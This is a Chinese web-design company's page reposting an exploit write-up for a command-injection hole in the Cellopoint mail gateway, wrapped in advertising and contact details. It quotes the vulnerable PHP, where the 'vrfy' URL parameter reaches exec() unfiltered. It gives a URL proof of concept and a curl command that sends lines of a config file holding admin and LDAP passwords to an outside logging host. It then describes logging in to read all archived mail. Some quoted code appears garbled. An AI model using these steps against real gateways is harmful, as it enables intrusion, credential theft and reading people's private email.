资讯

精准传达 • 有效沟通

从品牌网站建设到网络营销策划,从策略到执行的一站式服务

cellopoint邮件网关任意命令执行漏洞方示例分析

这篇文章将为大家详细讲解有关cellopoint邮件网关任意命令执行漏洞方示例分析,文章内容质量较高,因此小编分享给大家做个参考,希望大家阅读完这篇文章后对相关知识有一定的了解。

站在用户的角度思考问题,与客户深入沟通,找到罗湖网站设计与罗湖网站推广的解决方案,凭借多年的经验,让设计与互联网技术结合,创造个性化、用户体验好的作品,建站类型包括:网站设计制作、做网站、企业官网、英文网站、手机端网站、网站推广、域名申请、网页空间、企业邮箱。业务覆盖罗湖地区。

zend 解密

测试发现reporter目录下的gw_x_vrfy_n_test.php文件存在一处命令执行:

$email = $_GET["email"];$vrfy = $_GET["vrfy"]; 

$file = (isset($_GET["file"]) ? $_GET["file"] : $ini_default);

$debugFile = "/tmp/vrfy-test.err";$cmd = $GLOBALS["TopFileRoot"] . "smtpd/celloauth -v " . . " -n $vrfy -d 2> debugFile";

exec($cmd, $output, $ret);

$lines = @file($debugFile); 

URL内构造POC:gw_x_vrfy_n_test.php?vrfy=;$cmd;

的方式可以利用该漏洞执行命令(nobody权限)。

排查发现/usr/local/mozart/smtpd/default.ini文件保存各项邮件管理员、ldap等账户密码信息。

构造以下sed命令(通过sed命令读取目标文件单行内容):

curl%20-k%20https://cloudeye.me/?info=$(sed%20-n%20§3§p%20/usr/local/mozart/smtpd/default.ini),

通过查阅远端服务器(例如cloudeye.me)的web日志信息,

回显获取到default.ini文件内容,得到邮件归档管理员admin的口令或者配置的ldap密码,访问 $ip/report/login.php 登陆查阅全部邮件内容。

关于cellopoint邮件网关任意命令执行漏洞方示例分析就分享到这里了,希望以上内容可以对大家有一定的帮助,可以学到更多知识。如果觉得文章不错,可以把它分享出去让更多的人看到。


当前名称:cellopoint邮件网关任意命令执行漏洞方示例分析
网页URL:http://cdkjz.cn/article/gccjdc.html
多年建站经验

多一份参考,总有益处

联系快上网,免费获得专属《策划方案》及报价

咨询相关问题或预约面谈,可以通过以下方式与我们联系

大客户专线   成都:13518219792   座机:028-86922220